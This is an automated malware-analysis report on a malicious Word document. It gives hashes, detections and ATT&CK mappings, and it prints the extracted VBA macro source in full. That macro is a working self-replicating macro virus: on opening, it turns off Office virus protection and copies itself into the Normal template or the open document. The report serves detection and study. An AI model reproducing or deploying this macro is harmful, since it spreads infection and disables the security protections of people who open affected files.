Office (OLE) malware analysis — malicious · 910d0e50aac2540f

MALICIOUS

Office (OLE)

32.5 KB Created: 2013-12-24 00:59:00 Authoring application: Microsoft Office Word First seen: 2015-09-29

MD5: a1758b6d13933dce250ca0a274aeb230 SHA-1: 737035f8aedddc7a4e9bd54ba43cdcab2511f8dd SHA-256: 910d0e50aac2540f54336d8a7e90698b4bf7243f781b752c8ec1518f282b7ac8

150 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder T1553.005 Disable or Modify Security Settings

The sample contains VBA macros that explicitly disable virus protection and attempt to replicate their code to the current document or the Normal template. The script also attempts to save the document if its name does not match a specific pattern derived from the macro code. This behavior suggests an attempt to evade detection and maintain persistence.

Heuristics 5

ClamAV: Heuristics.Macro.DisableVirusProtection-6136181-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Heuristics.Macro.DisableVirusProtection-6136181-1
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION

VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
Matched line in script
```
    Options.VirusProtection = False
```
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
Private Sub Document_Open()
```
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1441 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	1441 bytes
SHA-256: `9299e72afe1cfe327ca211179d4256d1d66c64ceec6e639fbb1886a44a31df44`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True 'Close()Open()Close()Open() Private Sub Document_Open() On Error Resume Next Options.VirusProtection = False EnableCancelKey = wdCancelDisabled Set maci = MacroContainer.VBProject.VBComponents.Item(1) Set macic = maci.codemodule ns$ = Left(macic.Lines(1, 1), 21) Set inf = NormalTemplate: nsi$ = ns$ + "Close()" If MacroContainer = inf Then Set inf = ActiveDocument: nsi$ = ns$ + "Open()" Set infc = inf.VBProject.VBComponents Set infi = infc.Item(1) Set infic = infi.codemodule infi.Name = "ThisDocument" For mx = 2 To infc.Count infc.Remove infc.Item(2) Next mx If infic.countlines <> macic.countoflines Then infic.deletelines 1, infic.countoflines For coco = 1 To macic.countoflines infic.insertlines coco, macic.Lines(coco, 1) Next coco infic.replaceline 1, nsi$ End If If Left(ActiveDocument.Name, 8) <> Mid$(macic.Lines(1, 1), 13, 8) Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName EnableCancelKey = wdCancelDisabled End Sub 'ThisDocument v 1.0 1999

SHA-256: 9299e72afe1cfe327ca211179d4256d1d66c64ceec6e639fbb1886a44a31df44

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'Close()Open()Close()Open()
Private Sub Document_Open()
    On Error Resume Next
    Options.VirusProtection = False
    EnableCancelKey = wdCancelDisabled
    Set maci = MacroContainer.VBProject.VBComponents.Item(1)
    Set macic = maci.codemodule
    ns$ = Left(macic.Lines(1, 1), 21)
    Set inf = NormalTemplate: nsi$ = ns$ + "Close()"
        If MacroContainer = inf Then Set inf = ActiveDocument: nsi$ = ns$ + "Open()"
    Set infc = inf.VBProject.VBComponents
    Set infi = infc.Item(1)
    Set infic = infi.codemodule
    infi.Name = "ThisDocument"
    For mx = 2 To infc.Count
        infc.Remove infc.Item(2)
    Next mx
        If infic.countlines <> macic.countoflines Then
            infic.deletelines 1, infic.countoflines
            For coco = 1 To macic.countoflines
                infic.insertlines coco, macic.Lines(coco, 1)
            Next coco
            infic.replaceline 1, nsi$
        End If
    If Left(ActiveDocument.Name, 8) <> Mid$(macic.Lines(1, 1), 13, 8) Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
    EnableCancelKey = wdCancelDisabled
End Sub
'ThisDocument v 1.0 1999

Open this report in the interactive analyzer, or submit your own file for analysis.